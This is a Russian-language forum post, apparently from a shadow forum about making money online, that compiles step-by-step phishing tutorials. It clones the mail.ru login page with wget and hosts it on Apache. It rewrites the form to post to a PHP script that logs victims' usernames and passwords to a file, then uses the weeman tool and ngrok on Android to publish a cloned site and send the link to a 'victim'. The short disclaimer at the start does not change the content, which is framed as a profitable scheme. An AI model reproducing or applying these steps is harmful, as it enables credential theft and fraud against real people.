Дисклеймер: Статья предназначена в ознакомительных целях! Я не несу ответственности за ваши действия.
Технически процесс можно разделить на два простых этапа:
1. Подготовка копии сайта
2. Нахождение способа заставить жертву перейти на фэйковый сайт.
Отойдем немного к теории, фишинг это очень прибыльная тема. С помощью фишинга можно проворачивать как массовые взломы, так и точечные. На самом деле тут необходимо просто продумать схему — как запутать людей и чтоб они перешли на ваш фэйковый сайт и ввели свои данные. Здесь, как ни странно, все решает социальная инженерия, но об этом чуть позже.
Начнем с создания клона сайта:
Вид сайта задаёт html, а интерактивные элементы на странице управляются JavaScript. Так же в коде сайта могут быть ссылки на сторонние ресурсы, такие как картинки, аудиофайлы и т.п. Поэтому для создания копии не достаточно просто скопировать весь код страницы, надо перенести так же и сторонние ресурсы или переправить ссылки на них. Помимо этого нам нужно изменить логику работы приложения, чтобы данные отправлялись к нам на сервер и сохранялись там.
Как создать фишинговый сайт ВКонтакте | Создание фишинг сайта
Для примера попробуем создать реплику сайта страницы авторизации Mail. Её адрес https://account.mail.ru/login, чтобы нам просмотреть исходный код страницы в firefox достаточно нажать комбинацию клавиш Ctrl+U. Но нам не надо вручную всё копировать и сохранять все картинки: в Linux есть более простое решение. В консоли вводим команду wget —page-requisites —convert-links https://account.mail.ru/login
После этого у нас в папке, где была открыта консоль, появится папка account.mail.ru в которой будет файл login. Если открыть его в браузере, то мы увидим то же, что и на странице входа mail. Теперь надо создать сервер на котором будет храниться данная страница. Для теста создадим его локально, но процесс настройки на реальным сервере будет практически таким же. Убеждаемся, что web сервер работает. Для этого надо в браузере перейти на страницу http://127.0.0.1/
Если ничего не отобразилось, надо перезапустить веб-сервер 2 командами :
source /etc/apache2/envvars
systemctl restart apache2
После того как приветственная страница отображается, нужно скопировать в папку сервера скачанные wget’ом файлы. Для этого переходим в /var/www/html/ и переносим туда ранее скачанный файл login.
Теперь переходим в браузере по адресу login и нам отображается страница авторизации, то храниться она уже на нашем сервере. Теперь надо реализовать функцию сохранения паролей, для этого надо в текстовом редакторе открыть файл login и найти там страницу, на которую отправляются данные пользователя(за это отвечает параметр action). Для этого нажимаем ctrl+F и набираем action=»https://auth.mail.ru/cgi-bin/auth»
Меняем найденный текст на action=»auth.php».
Затем в папке с login создаём новый файл auth.php. Открываем его текстовым редактором и пишем туда
file_put_contents(‘log/login_log.txt’, «Username: «.$_POST[‘Username’].» Password: «.$_POST[‘Password’].’n’, FILE_APPEND);
Фишинг — Как создать и как защититься?
?>
file_put_contents функция для записи данных в файл, log/login_log.txt — путь к файлу. $_POST[‘Username’] — имя пользователя из формы, а $_POST[‘Password’] пароль. FILE_APPEND указывает, что файл не надо каждый раз перезаписывать, а новые данные добавляются в конец.
Теперь надо создать папку, куда будут сохраняться данные. Для этого в папке в login надо в пустом месте кликнуть правой кнопкой мыши и выбрать Open in terminal.
В появившимся окне вводим :
mkdir log
chmod 777 log
Источник: teletype.in
Создаем фишинговую ссылку на Android
Теневой Комитет
Сначала скачаем и установим самую новую версию «Termux»:
Для установки утилиты — нам потребуется ввести несколько команд в установленном и открытом «termux»:
Теперь обновим пакеты и репозиторий:
pkg update -y pkg upgrade -y
Установим «git» и «python 2»:
apt install git apt install python2
Скачаем утилиту «weeman»:
Установка окончена! Осталось только включить данную утилиту:
Откроем директорию инструмента:
А теперь включим саму утилиту:
python2 weeman.py
Программа запущена! Для создания фишинговой странички — читайте статью дальше:
Устанавливаем сайт, который будет скопирован ( Полный URL ):
Устанавливаем URL сайта, на который перекинет жертву, после ввода данных на нашей страничке ( Полный URL ):
Устанавливаем порт для дальнейшей работы в «ngrok» ( На не рутированных устройствах — только «8080» ) :
set port 8080
Чекаем настройки фишинг странички и запускаем сайт:
После того, как наша утилита скачала сайт и запустилась в локальной сети нашего устройства — нам нужно установить и настроить «ngrok», чтобы в дальнейшем мы смогли дать ссылку на нашу страничку жертве.
Откроем новую сессию «termux»:
Установим «ngrok»:
apt update apt upgrade
apt install git
git clone https://github.com/tchelospy/termux-ngrok.git
cd termux-ngrok
chmod +x termux-ngrok.sh
./termux-ngrok.sh
( После ввода последней команды — нужно ввести букву «y» для соглашение с установкой «ngrok» )
Теперь нам нужно авторизоваться на сайте «ngrok» любым способом: https://ngrok.com
После авторизации нам нужно скопировать ключ нашего аккаунта ( ключ замазан на картике зеленым цветом ):
После копирования ключа — нас нужно ввести команду для активации вашего аккаунта в «termux»:
ngrok authtoken
После данных манипуляций ваш аккаунт должен был подключится к «ngrok», который установлен на вашем устройстве.
Теперь вам нужно всего лишь ввести данную команду:
ngrok http 8080
С помощью данной команду мы открыли сайт в интернете, который работает в нашей локальной сети, то-есть у нас есть ссылка на фишинговый сайт:
Просто скопируйте одну из данных ссылок и киньте вашей жертве. После того, как жертва введет хоть какие-то данные на вашем сайте — они отобразятся в сесси, там где мы запустили утилиту «weeman». Если вам не нравится данная ссылка — ее можно сократить на любом сайте или приложении по сокращению ссылок.
Источник: telegra.ph
Делаем копию любого сайта для фишинга
Создайте аккаунт или войдите в него для комментирования
Вы должны быть пользователем, чтобы оставить комментарий
Создать аккаунт
Зарегистрируйтесь для получения аккаунта. Это просто!
Войти
Уже зарегистрированы? Войдите здесь.
О НAC
h0st — теневой форум созданный для обмена профильной информацией по работе в разных областях. Один из самых посещаемых тематический ресурсов о заработке в сети интернет. Не забывайте пользоваться услугами Гарант-сервиса, при совершении сделок, чтобы избежать мошенничества.
FAQ
ОТВЕТСТВЕННОСТЬ
Администрация не несет никакой ответственности за публикации на данном форуме. Если Вы считаете, что в темах и сообщениях может содержаться информация, запрещенная к распространению, просим незамедлительно сообщить Администрации.
Источник: xost.cc